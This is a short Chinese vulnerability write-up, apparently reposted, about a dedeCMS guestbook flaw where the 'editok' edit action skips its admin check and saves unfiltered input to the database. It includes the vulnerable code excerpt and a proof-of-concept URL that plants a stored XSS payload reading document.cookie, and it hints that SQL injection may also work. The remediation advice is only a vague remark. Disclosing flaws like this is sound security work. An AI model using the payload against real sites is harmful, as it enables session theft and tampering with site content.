dedeCMS某处由于权限绕过可导致跨站脚本攻击
首先是/plus/guestbook.php
action=admin然后来到/guestbook/edit.inc.php
else if($job=='editok')//这里没有判断$g_isadmin
{
$remsg = trim($remsg);
略
$dsql->ExecuteNoneQuery("update `detest_guestbook` set `msg`='$msg', `posttime`='".time()."' where id='$id' ");//而这里没有过滤,可以写代码了……
ShowMsg("成功更改或回复一条留言!",$GUEST_BOOK_POS);
exit();
}
http://www.xxx.com/plus/guestbook.php?action=admin&job=editok&id=100&msg=<body onload=alert(document.cookie)>
这个id,可以在[回复/编辑]这个按钮处看到
仔细试试没准还能试出注入呢。。。。
修复方案: 权限啊,过滤啊,自己看着办吧
查看更多关于dedeCMS留言权限绕过导致跨站攻击及修复 - 网站安的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did13382